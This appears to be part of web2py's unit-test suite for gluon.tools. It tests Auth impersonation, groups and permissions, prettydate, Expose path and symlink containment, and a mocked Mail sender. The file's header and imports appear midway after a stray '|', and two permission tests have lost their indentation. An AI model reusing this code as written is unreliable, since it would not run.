                     b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-mail: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
    self.auth.logout_bare()
    # Failing impersonation
    # User lacking impersonate membership
    self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first())  # bypass login_bare()
    # self.assertTrue(self.auth.is_logged_in())  # For developing test
    # self.assertFalse(self.auth.is_impersonating())  # For developing test
    self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, bart_id)
    self.auth.logout_bare()
    # Try impersonate a non existing user
    self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first())  # bypass login_bare()
    # self.assertTrue(self.auth.is_logged_in())  # For developing test
    # self.assertFalse(self.auth.is_impersonating())  # For developing test
    self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000)  # user with id 1000 shouldn't exist
    # Try impersonate user with id = 0 or '0' when bart impersonating omer
    self.auth.impersonate(user_id=omer_id)
    self.assertTrue(self.auth.is_impersonating())
    # user_id=0 presumably reverts to the original identity — TODO confirm.
    self.assertEqual(self.auth.impersonate(user_id=0), None)
# TODO: def test_update_groups(self):
def test_groups(self):
    """groups() renders the logged-in user's group memberships as a table."""
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.auth.login_user(bart)  # bypass login_bare()
    expected = (b'<table><tr><td><h3>user_1(1)</h3></td></tr>'
                b'<tr><td><p></p></td></tr></table>')
    self.assertEqual(self.auth.groups().xml(), expected)
def test_not_authorized(self):
    """Ajax requests get HTTP 403; plain requests get the denied message."""
    self.current.request.ajax = 'facke_ajax_request'
    with self.myassertRaisesRegex(HTTP, "403*"):
        self.auth.not_authorized()
    self.current.request.ajax = None
    self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
def test_allows_jwt(self):
    """Without any JWT configured on this Auth, allows_jwt() raises HTTP 400."""
    with self.myassertRaisesRegex(HTTP, "400*"):
        self.auth.allows_jwt()
# TODO: def test_requires(self):
# def test_login(self):
# Basic testing above in "test_basic_blank_forms()" could be refined here
# TODO: def test_requires_login_or_token(self):
# TODO: def test_requires_membership(self):
# TODO: def test_requires_permission(self):
# TODO: def test_requires_signature(self):
def test_add_group(self):
    """add_group() returns the id of the freshly created auth_group row."""
    new_id = self.auth.add_group(role='a_group', description='a_group_role_description')
    stored = self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first()
    self.assertEqual(new_id, stored.id)
def test_del_group(self):
    """Deleting bart's auto-created personal group (group 1) returns None."""
    self.assertEqual(self.auth.del_group(group_id=1), None)
def test_id_group(self):
    """id_group() maps a role name to its group id, or None when unknown."""
    existing = self.auth.id_group(role='user_1')
    self.assertEqual(existing, 1)
    missing = self.auth.id_group(role='non_existing_role_name')
    self.assertEqual(missing, None)
def test_user_group(self):
    """Bart is user 1; his auto-created personal group is group 1 ('user_1')."""
    self.assertEqual(self.auth.user_group(user_id=1), 1)
def test_user_group_role(self):
    """user_group_role(): implicit user, explicit user_id, and disabled groups."""
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.auth.login_user(bart)  # bypass login_bare()
    # While logged in the role is derived from the current user's id.
    self.assertEqual(self.auth.user_group_role(), 'user_%s' % bart.id)
    self.auth.logout_bare()
    # Passing user_id explicitly works while logged out.
    self.assertEqual(self.auth.user_group_role(user_id=1), 'user_1')
    # With create_user_groups disabled the role is None.
    self.auth.settings.create_user_groups = None
    self.assertEqual(self.auth.user_group_role(user_id=1), None)
def test_has_membership(self):
    """has_membership() by role name, by group_id, logged in and logged out."""
    self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first())  # bypass login_bare()
    self.assertTrue(self.auth.has_membership('user_1'))
    self.assertFalse(self.auth.has_membership('user_555'))
    self.assertTrue(self.auth.has_membership(group_id=1))
    self.auth.logout_bare()
    # Logged out, an explicit user_id still resolves the membership.
    self.assertTrue(self.auth.has_membership(role='user_1', user_id=1))
    self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
    # check that event is logged
    # NOTE(review): the assertion below checks the auth_event count is
    # UNCHANGED, which contradicts the comment above — confirm whether
    # has_membership() is actually expected to log an event here.
    count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
    self.assertTrue(self.auth.has_membership(group_id=1, user_id=1))
    count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
    self.assertEqual(count_log_event_test_after, count_log_event_test_before)
def test_add_membership(self):
    """add_membership() by group_id, by role, with explicit and implicit user."""
    user = self.db(self.db.auth_user.username == 'bart').select().first()  # bypass login_bare()
    user_id = user.id
    role_name = 'test_add_membership_group'
    group_id = self.auth.add_group(role_name)
    self.assertFalse(self.auth.has_membership(role_name))
    # Explicit user_id: add by group_id, then by role name.
    self.auth.add_membership(group_id=group_id, user_id=user_id)
    self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
    self.auth.del_membership(group_id=group_id, user_id=user_id)
    self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
    self.auth.add_membership(role=role_name, user_id=user_id)
    self.assertTrue(self.auth.has_membership(group_id, user_id=user_id))
    self.auth.del_membership(group_id=group_id, user_id=user_id)
    self.assertFalse(self.auth.has_membership(group_id, user_id=user_id))
    # Invalid group/role/user references must raise ValueError.
    with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
        self.auth.add_membership(group_id='not_existing_group_name', user_id=user_id)
    with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
        self.auth.add_membership(role='not_existing_role_name', user_id=user_id)
    with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
        self.auth.add_membership(group_id=group_id, user_id=None)
    with self.myassertRaisesRegex(ValueError, '^user_id not provided or invalid$'):
        self.auth.add_membership(role=role_name, user_id=None)
    # Logged-in user: user_id defaults to the current user.
    self.auth.login_user(user)
    self.auth.add_membership(group_id=group_id)
    self.assertTrue(self.auth.has_membership(group_id))
    self.auth.del_membership(group_id=group_id)
    self.assertFalse(self.auth.has_membership(group_id))
    self.auth.add_membership(role=role_name)
    self.assertTrue(self.auth.has_membership(group_id))
    self.auth.del_membership(group_id=group_id)
    self.assertFalse(self.auth.has_membership(group_id))
    # default usage (group_id=role_name)
    self.auth.add_membership(role_name)
    self.assertTrue(self.auth.has_membership(group_id))
    self.auth.del_membership(group_id=group_id)
    self.assertFalse(self.auth.has_membership(group_id))
    # re-adding a membership should return the existing membership
    record0_id = self.auth.add_membership(group_id)
    self.assertTrue(self.auth.has_membership(group_id))
    record1_id = self.auth.add_membership(group_id)
    self.assertEqual(record0_id, record1_id)
    self.auth.del_membership(group_id=group_id)
    self.assertFalse(self.auth.has_membership(group_id))
    # Invalid references also raise when user_id is implicit.
    with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
        self.auth.add_membership(group_id='not_existing_group_name')
    with self.myassertRaisesRegex(ValueError, '^group_id not provided or invalid$'):
        self.auth.add_membership(role='not_existing_role_name')
def test_del_membership(self):
    """del_membership() while logged in, logged out, and with explicit user_id."""
    self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first())  # bypass login_bare()
    count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
    user_1_role_id = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
                             ).select(self.db.auth_membership.id).first().id
    self.assertEqual(self.auth.del_membership('user_1'), user_1_role_id)
    count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
    # check that event is logged
    # NOTE(review): this asserts the auth_event count is UNCHANGED, which
    # contradicts the comment above — confirm the intended logging behaviour.
    self.assertEqual(count_log_event_test_after, count_log_event_test_before)
    # not logged in test case
    group_id = self.auth.add_group('some_test_group')
    membership_id = self.auth.add_membership('some_test_group')
    self.assertEqual(self.auth.user_groups[group_id], 'some_test_group')
    self.auth.logout_bare()
    # not deleted
    # Without a logged-in user and no explicit user_id, nothing is removed.
    self.assertFalse(self.auth.del_membership('some_test_group'))
    self.assertEqual(set(self.db.auth_membership(membership_id).as_dict().items()),
                     set({'group_id': 2, 'user_id': 1, 'id': 2}.items()))  # is not deleted
    # deleted
    bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
    self.assertTrue(self.auth.del_membership('some_test_group', user_id=bart_id))
    self.assertEqual(self.db.auth_membership(membership_id), None)  # is really deleted
def test_has_permission(self):
    """A granted permission is found; an unknown permission name is not."""
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.auth.login_user(bart)  # bypass login_bare()
    group_id = self.auth.id_group('user_1')
    self.auth.add_permission(group_id=group_id,
                             name='some_permission',
                             table_name='auth_user',
                             record_id=0,
                             )
    # The permission just granted is visible.
    self.assertTrue(self.auth.has_permission(name='some_permission',
                                             table_name='auth_user',
                                             record_id=0,
                                             user_id=bart.id,
                                             group_id=group_id))
    # A name that was never granted is not.
    self.assertFalse(self.auth.has_permission(name='some_other_permission',
                                              table_name='auth_user',
                                              record_id=0,
                                              user_id=bart.id,
                                              group_id=group_id))
def test_add_permission(self):
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
permission_id = \
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# True case
permission_count = \
self.db(self.db.auth_permission.id == permission_id).count()
self.assertTrue(permission_count)
# False case
permission_count = \
self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
(self.db.auth_permission.name == 'no_permission') &
(self.db.auth_permission.table_name == 'no_table') &
(self.db.auth_permission.record_id == 0)).count()
self.assertFalse(permission_count)
# corner case
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
permission_id = \
self.auth.add_permission(group_id=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
permission_name = \
self.db(self.db.auth_permission.id == permission_id).select(self.db.auth_permission.name).first().name
self.assertEqual(permission_name, 'user_1_permission')
# add an existing permission
permission_id =\
self.auth.add_permission(group_id=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(permission_id)
def test_del_permission(self):
permission_id = \
self.auth.add_permission(group_id=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,
)
count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.del_permission(group_id=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,))
count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
# check that event is logged
self.assertEqual(count_log_event_test_after, count_log_event_test_before)
# really deleted
permission_count = \
self.db(self.db.auth_permission.id == permission_id).count()
self.assertFalse(permission_count)
# TODO: def test_accessible_query(self):
# TODO: def test_archive(self):
# TODO: def test_wiki(self):
# TODO: def test_wikimenu(self):
# End Auth test
# TODO: class TestCrud(unittest.TestCase):
# It deprecated so far from a priority
# TODO: class TestService(unittest.TestCase):
# TODO: class TestPluginManager(unittest.TestCase):
# TODO: class TestWiki(unittest.TestCase):
# TODO: class TestConfig(unittest.TestCase):
class TestToolsFunctions(unittest.TestCase):
    """
    Test suite for all the tools.py functions
    """
    def test_prettydate(self):
        """prettydate() renders past/future datetimes, dates, utc and bad input."""
        now = datetime.datetime.now()
        # past datetimes: (timedelta kwargs, expected label)
        past_cases = [
            (dict(seconds=0), 'now'),
            (dict(seconds=1), '1 second ago'),
            (dict(seconds=2), '2 seconds ago'),
            (dict(seconds=60), '1 minute ago'),
            (dict(seconds=61), '1 minute ago'),
            (dict(seconds=120), '2 minutes ago'),
            (dict(seconds=121), '2 minutes ago'),
            (dict(seconds=60 * 60), '1 hour ago'),
            (dict(seconds=3601), '1 hour ago'),
            (dict(seconds=2 * 60 * 60), '2 hours ago'),
            (dict(seconds=2 * 60 * 60 + 1), '2 hours ago'),
            (dict(days=1), '1 day ago'),
            (dict(days=2), '2 days ago'),
            (dict(days=7), '1 week ago'),
            (dict(days=8), '1 week ago'),
            (dict(days=14), '2 weeks ago'),
            (dict(days=15), '2 weeks ago'),
            (dict(days=21), '3 weeks ago'),
            (dict(days=27), '1 month ago'),
            (dict(days=28), '1 month ago'),
            (dict(days=60), '2 months ago'),
            (dict(days=90), '3 months ago'),
            (dict(days=365), '1 year ago'),
            (dict(days=366), '1 year ago'),
            (dict(days=2 * 365), '2 years ago'),
            (dict(days=2 * 365 + 1), '2 years ago'),
        ]
        for delta_kwargs, expected in past_cases:
            moment = now - datetime.timedelta(**delta_kwargs)
            self.assertEqual(prettydate(d=moment), expected)
        # plain date() values
        today = now.date()
        self.assertEqual(prettydate(d=today), 'now')
        self.assertEqual(prettydate(d=today - datetime.timedelta(days=1)), '1 day ago')
        self.assertEqual(prettydate(d=today - datetime.timedelta(days=2)), '2 days ago')
        # future datetimes
        # "from now" is picky depending on execution time, so sharp values like
        # exactly 1 second or 1 day cannot be used here
        self.assertEqual(prettydate(d=now - datetime.timedelta(seconds=-65)),
                         '1 minute from now')
        self.assertEqual(prettydate(d=now - datetime.timedelta(hours=-23.5)),
                         '23 hours from now')
        self.assertEqual(prettydate(d=now - datetime.timedelta(days=-366)),
                         '1 year from now')
        # utc=True
        utc_now = datetime.datetime.utcnow()
        self.assertEqual(prettydate(d=utc_now, utc=True), 'now')
        self.assertEqual(prettydate(d=utc_now - datetime.timedelta(seconds=1), utc=True),
                         '1 second ago')
        # missing or invalid input
        self.assertEqual(prettydate(d=None), '')
        self.assertEqual(prettydate(d='invalid_date'), '[invalid date]')
# shorthand used by the Expose tests below
pjoin = os.path.join


def have_symlinks():
    """Return True on POSIX platforms, where symlinks can be created."""
    return os.name == 'posix'
class Test_Expose__in_base(unittest.TestCase):
    """Tests for the private Expose.__in_base(subdir, basedir, sep) helper."""
    def test_in_base(self):
        """Paths equal to or nested inside the base directory are accepted."""
        for subdir, basedir in (('/foo/bar', '/foo'),
                                ('/foo', '/foo'),
                                ('/foo', '/'),
                                ('/', '/')):
            self.assertTrue(Expose._Expose__in_base(subdir=subdir, basedir=basedir, sep='/'),
                            '%s is not under %s' % (subdir, basedir))
    def test_not_in_base(self):
        """Paths outside base — including same-prefix siblings — are rejected."""
        for subdir, basedir in (('/foobar', '/foo'),
                                ('/foo', '/foo/bar'),
                                ('/bar', '/foo'),
                                ('/foo/bar', '/bar'),
                                ('/', '/x')):
            self.assertFalse(Expose._Expose__in_base(subdir=subdir, basedir=basedir, sep='/'),
                             '%s should not be under %s' % (subdir, basedir))
class TestExpose(unittest.TestCase):
    """End-to-end tests for Expose over a real temporary directory tree.

    setUp() builds the tree sketched below, precomputes the expected
    folder/file HTML tables, and patches tools.URL with a deterministic
    stand-in; tearDown() restores URL and removes the tree.
    """
    def setUp(self):
        # temporary sandbox; removed in tearDown()
        self.base_dir = tempfile.mkdtemp()
        self.make_dirs()
        self.touch_files()
        self.make_readme()
        if have_symlinks():
            self.make_symlinks()
        # $BASE/
        # |-- inside/
        # |   |-- dir1/
        # |   |   |-- file1
        # |   |   `-- file2
        # |   |-- dir2/
        # |   |   |-- link_to_dir1/@ -> $BASE/inside/dir1/
        # |   |   `-- link_to_file1@ -> $BASE/inside/dir1/file1
        # |   |-- link_to_outside/@ -> $BASE/outside/
        # |   |-- link_to_file3@ -> $BASE/outside/file3
        # |   `-- README
        # `-- outside/
        #     `-- file3
        self.set_expectations()
        # deterministic URL builder so expectations can hard-code hrefs
        tools.URL = lambda args: URL(a='a', c='c', f='f', args=args)
    def tearDown(self):
        # restore the real URL helper and drop the sandbox
        tools.URL = URL
        shutil.rmtree(self.base_dir)
    def make_dirs(self):
        """setup directory structure"""
        for d in (['inside'],
                  ['inside', 'dir1'],
                  ['inside', 'dir2'],
                  ['outside']):
            os.mkdir(pjoin(self.base_dir, *d))
    def touch_files(self):
        """create some files"""
        for f in (['inside', 'dir1', 'file1'],
                  ['inside', 'dir1', 'file2'],
                  ['outside', 'file3']):
            with open(pjoin(self.base_dir, *f), 'a'):
                pass
    def make_readme(self):
        """README gets real content (unlike the empty touched files)."""
        with open(pjoin(self.base_dir, 'inside', 'README'), 'w') as f:
            f.write('README content')
    def make_symlinks(self):
        """setup extension for posix systems"""
        # inside links
        os.symlink(
            pjoin(self.base_dir, 'inside', 'dir1'),
            pjoin(self.base_dir, 'inside', 'dir2', 'link_to_dir1'))
        os.symlink(
            pjoin(self.base_dir, 'inside', 'dir1', 'file1'),
            pjoin(self.base_dir, 'inside', 'dir2', 'link_to_file1'))
        # outside links
        os.symlink(
            pjoin(self.base_dir, 'outside'),
            pjoin(self.base_dir, 'inside', 'link_to_outside'))
        os.symlink(
            pjoin(self.base_dir, 'outside', 'file3'),
            pjoin(self.base_dir, 'inside', 'link_to_file3'))
    def set_expectations(self):
        """Precompute the folder/file tables Expose should render per path."""
        url = lambda args: URL('a', 'c', 'f', args=args)
        self.expected_folders = {}
        self.expected_folders['inside'] = SPAN(H3('Folders'), TABLE(
            TR(TD(A('dir1', _href=url(args=['dir1'])))),
            TR(TD(A('dir2', _href=url(args=['dir2'])))),
            _class='table',
        ))
        self.expected_folders[pjoin('inside', 'dir1')] = ''
        if have_symlinks():
            self.expected_folders[pjoin('inside', 'dir2')] = SPAN(H3('Folders'), TABLE(
                TR(TD(A('link_to_dir1', _href=url(args=['dir2', 'link_to_dir1'])))),
                _class='table',
            ))
        else:
            self.expected_folders[pjoin('inside', 'dir2')] = ''
        self.expected_files = {}
        self.expected_files['inside'] = SPAN(H3('Files'), TABLE(
            TR(TD(A('README', _href=url(args=['README']))), TD('')),
            _class='table',
        ))
        self.expected_files[pjoin('inside', 'dir1')] = SPAN(H3('Files'), TABLE(
            TR(TD(A('file1', _href=url(args=['dir1', 'file1']))), TD('')),
            TR(TD(A('file2', _href=url(args=['dir1', 'file2']))), TD('')),
            _class='table',
        ))
        if have_symlinks():
            self.expected_files[pjoin('inside', 'dir2')] = SPAN(H3('Files'), TABLE(
                TR(TD(A('link_to_file1', _href=url(args=['dir2', 'link_to_file1']))), TD('')),
                _class='table',
            ))
        else:
            self.expected_files[pjoin('inside', 'dir2')] = ''
    def make_expose(self, base, show='', follow_symlink_out=False):
        """Build an Expose rooted at base_dir/base, displaying the 'show' path."""
        current.request = Request(env={})
        current.request.raw_args = show
        current.request.args = show.split('/')
        return Expose(base=pjoin(self.base_dir, base),
                      basename=base,
                      follow_symlink_out=follow_symlink_out)
    def test_expose_inside_state(self):
        """Root listing of 'inside': both dirs plus the README."""
        expose = self.make_expose(base='inside', show='')
        self.assertEqual(expose.args, [])
        self.assertEqual(expose.folders, ['dir1', 'dir2'])
        self.assertEqual(expose.filenames, ['README'])
    @unittest.skipUnless(have_symlinks(), 'requires symlinks')
    def test_expose_inside_state_floow_symlink_out(self):
        """With follow_symlink_out=True, out-of-base links are listed too."""
        expose = self.make_expose(base='inside', show='',
                                  follow_symlink_out=True)
        self.assertEqual(expose.args, [])
        self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
        self.assertEqual(expose.filenames, ['README', 'link_to_file3'])
    def test_expose_inside_dir1_state(self):
        expose = self.make_expose(base='inside', show='dir1')
        self.assertEqual(expose.args, ['dir1'])
        self.assertEqual(expose.folders, [])
        self.assertEqual(expose.filenames, ['file1', 'file2'])
    def test_expose_inside_dir2_state(self):
        # dir2 only contains symlinks, so its listing is platform dependent
        expose = self.make_expose(base='inside', show='dir2')
        self.assertEqual(expose.args, ['dir2'])
        if have_symlinks():
            self.assertEqual(expose.folders, ['link_to_dir1'])
            self.assertEqual(expose.filenames, ['link_to_file1'])
        else:
            self.assertEqual(expose.folders, [])
            self.assertEqual(expose.filenames, [])
    def test_expose_base_inside_state(self):
        # in-base symlinks are visible when exposing from the sandbox root
        expose = self.make_expose(base='', show='inside')
        self.assertEqual(expose.args, ['inside'])
        if have_symlinks():
            self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
            self.assertEqual(expose.filenames, ['README', 'link_to_file3'])
        else:
            self.assertEqual(expose.folders, ['dir1', 'dir2'])
            self.assertEqual(expose.filenames, ['README'])
    def test_expose_base_inside_dir2_state(self):
        expose = self.make_expose(base='', show='inside/dir2')
        self.assertEqual(expose.args, ['inside', 'dir2'])
        if have_symlinks():
            self.assertEqual(expose.folders, ['link_to_dir1'])
            self.assertEqual(expose.filenames, ['link_to_file1'])
        else:
            self.assertEqual(expose.folders, [])
            self.assertEqual(expose.filenames, [])
    def assertSameXML(self, a, b):
        """Compare helpers/strings by their rendered XML."""
        self.assertEqual(a if isinstance(a, str) else a.xml(),
                         b if isinstance(b, str) else b.xml())
    def run_test_xml_for(self, base, show):
        """Render Expose tables for base/show and compare with the expectations."""
        expose = self.make_expose(base, show)
        path = pjoin(base, show).rstrip(os.path.sep)
        request = Request(env={})  # NOTE(review): unused local — candidate for removal
        self.assertSameXML(expose.table_files(), self.expected_files[path])
        self.assertSameXML(expose.table_folders(), self.expected_folders[path])
    def test_xml_inside(self):
        self.run_test_xml_for(base='inside', show='')
    def test_xml_dir1(self):
        self.run_test_xml_for(base='inside', show='dir1')
    def test_xml_dir2(self):
        self.run_test_xml_for(base='inside', show='dir2')
    def test_file_not_found(self):
        # a missing path must raise HTTP
        with self.assertRaises(HTTP):
            self.make_expose(base='inside', show='dir1/file_not_found')
    def test_not_authorized(self):
        # a symlink pointing out of base must raise HTTP when not followed
        with self.assertRaises(HTTP):
            self.make_expose(base='inside', show='link_to_file3')
| #!/bin/python
# -*- coding: utf-8 -*-
"""
Unit tests for gluon.tools
"""
import os
import sys
import shutil
import tempfile
import smtplib
import datetime
import unittest
DEFAULT_URI = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import Table
from gluon import tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose, prevent_open_redirect
from gluon._compat import PY2, to_bytes
from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
IS_IMAP = "imap" in DEFAULT_URI
class TestMail(unittest.TestCase):
    """
    Test the Mail class against a monkey-patched smtplib.

    setUp() swaps smtplib.SMTP / SMTP_SSL for DummySMTP so nothing ever
    touches the network; tearDown() restores the real classes.
    """
    class Message(object):
        # Captured message: sender address, recipient list and the raw payload.
        def __init__(self, sender, to, payload):
            self.sender = sender
            self.to = to
            self.payload = payload
            self._parsed_payload = None
        @property
        def parsed_payload(self):
            """Lazily parse the raw payload into an email.message.Message."""
            if self._parsed_payload is None:
                import email
                self._parsed_payload = email.message_from_string(self.payload)
            return self._parsed_payload
    class DummySMTP(object):
        """
        Dummy smtp server

        NOTE: Test methods should take care of always leaving inbox and users empty when they finish.
        """
        # class-level on purpose: shared by every DummySMTP instance so tests
        # can inspect what was "sent" after Mail.send() returns
        inbox = []
        users = {}
        def __init__(self, address, port, **kwargs):
            self.address = address
            self.port = port
            self.has_quit = False
            self.tls = False
        def login(self, username, password):
            # NOTE(review): raising the bare class calls SMTPAuthenticationError()
            # with no (code, msg) args, which actually raises TypeError here;
            # Mail.send() swallows any exception, so the tests pass either way —
            # consider raising smtplib.SMTPAuthenticationError(534, 'auth failed').
            if username not in self.users or self.users[username] != password:
                raise smtplib.SMTPAuthenticationError
            self.username = username
            self.password = password
        def sendmail(self, sender, to, payload):
            self.inbox.append(TestMail.Message(sender, to, payload))
        def quit(self):
            self.has_quit = True
        def ehlo(self, hostname=None):
            pass
        def starttls(self):
            self.tls = True
    def setUp(self):
        # patch smtplib so Mail talks to DummySMTP instead of a real server
        self.original_SMTP = smtplib.SMTP
        self.original_SMTP_SSL = smtplib.SMTP_SSL
        smtplib.SMTP = TestMail.DummySMTP
        smtplib.SMTP_SSL = TestMail.DummySMTP
    def tearDown(self):
        smtplib.SMTP = self.original_SMTP
        smtplib.SMTP_SSL = self.original_SMTP_SSL
    def test_hello_world(self):
        """Plain-text send: sender, recipients, headers and body reach the server."""
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  subject='hello',
                                  # If reply_to is omitted, then mail.settings.sender is used
                                  reply_to='us@example.com',
                                  message='world'))
        message = TestMail.DummySMTP.inbox.pop()
        self.assertEqual(message.sender, mail.settings.sender)
        self.assertEqual(message.to, ['somebody@example.com'])
        header = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
        self.assertTrue(header in message.payload)
        self.assertTrue(message.payload.endswith('world'))
    def test_failed_login(self):
        """send() returns False when SMTP authentication fails."""
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        mail.settings.login = 'username:password'
        self.assertFalse(mail.send(to=['somebody@example.com'],
                                   subject='hello',
                                   # If reply_to is omitted, then mail.settings.sender is used
                                   reply_to='us@example.com',
                                   message='world'))
    def test_login(self):
        """send() succeeds when credentials match a known DummySMTP user."""
        TestMail.DummySMTP.users['username'] = 'password'
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        mail.settings.login = 'username:password'
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  subject='hello',
                                  # If reply_to is omitted, then mail.settings.sender is used
                                  reply_to='us@example.com',
                                  message='world'))
        # leave users/inbox empty for the next test (see DummySMTP note)
        del TestMail.DummySMTP.users['username']
        TestMail.DummySMTP.inbox.pop()
    def test_html(self):
        """An HTML body is sent with a text/html content type."""
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  subject='hello',
                                  # If reply_to is omitted, then mail.settings.sender is used
                                  reply_to='us@example.com',
                                  message='<html><head></head><body></body></html>'))
        message = TestMail.DummySMTP.inbox.pop()
        self.assertTrue('Content-Type: text/html' in message.payload)
    def test_alternative(self):
        """A (text, html) message tuple becomes a multipart/alternative payload."""
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  message=('Text only', '<html><pre>HTML Only</pre></html>')))
        message = TestMail.DummySMTP.inbox.pop()
        self.assertTrue(message.parsed_payload.is_multipart())
        self.assertTrue(message.parsed_payload.get_content_type() == 'multipart/alternative')
        parts = message.parsed_payload.get_payload()
        self.assertTrue('Text only' in parts[0].as_string())
        self.assertTrue('<html><pre>HTML Only</pre></html>' in parts[1].as_string())
    def test_ssl(self):
        """send() works with settings.ssl enabled (DummySMTP stands in for SMTP_SSL)."""
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        mail.settings.ssl = True
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  subject='hello',
                                  # If reply_to is omitted, then mail.settings.sender is used
                                  reply_to='us@example.com',
                                  message='world'))
        TestMail.DummySMTP.inbox.pop()
    def test_tls(self):
        """send() works with settings.tls enabled."""
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        mail.settings.tls = True
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  subject='hello',
                                  # If reply_to is omitted, then mail.settings.sender is used
                                  reply_to='us@example.com',
                                  message='world'))
        TestMail.DummySMTP.inbox.pop()
    def test_attachment(self):
        """Attachments round-trip: content, required name, custom content-id/type."""
        module_file = os.path.abspath(__file__)
        mail = Mail()
        mail.settings.server = 'smtp.example.com:25'
        mail.settings.sender = 'you@example.com'
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  subject='hello',
                                  message='world',
                                  attachments=Mail.Attachment(module_file)))
        message = TestMail.DummySMTP.inbox.pop()
        attachment = message.parsed_payload.get_payload(1).get_payload(decode=True)
        with open(module_file, 'rb') as mf:
            self.assertEqual(to_bytes(attachment), to_bytes(mf.read()))
        # Test missing attachment name error
        stream = open(module_file)
        self.assertRaises(Exception, lambda *args, **kwargs: Mail.Attachment(*args, **kwargs), stream)
        stream.close()
        # Test you can define content-id and content type
        self.assertTrue(mail.send(to=['somebody@example.com'],
                                  subject='hello',
                                  message='world',
                                  attachments=Mail.Attachment(module_file, content_id='trololo', content_type='tra/lala')))
        message = TestMail.DummySMTP.inbox.pop()
        self.assertTrue('Content-Type: tra/lala' in message.payload)
        self.assertTrue('Content-Id: <trololo>' in message.payload)
# TODO: class TestAuthJWT(unittest.TestCase):
class TestAuthJWT(unittest.TestCase):
    """Tests for AuthJWT: token issuing/refresh and the allows_jwt decorator."""
    def setUp(self):
        # local imports keep the gluon dependencies scoped to this suite
        from gluon.tools import AuthJWT
        from gluon import current
        # minimal fake request wired into the thread-local current
        self.request = Request(env={})
        self.request.application = 'a'
        self.request.controller = 'c'
        self.request.function = 'f'
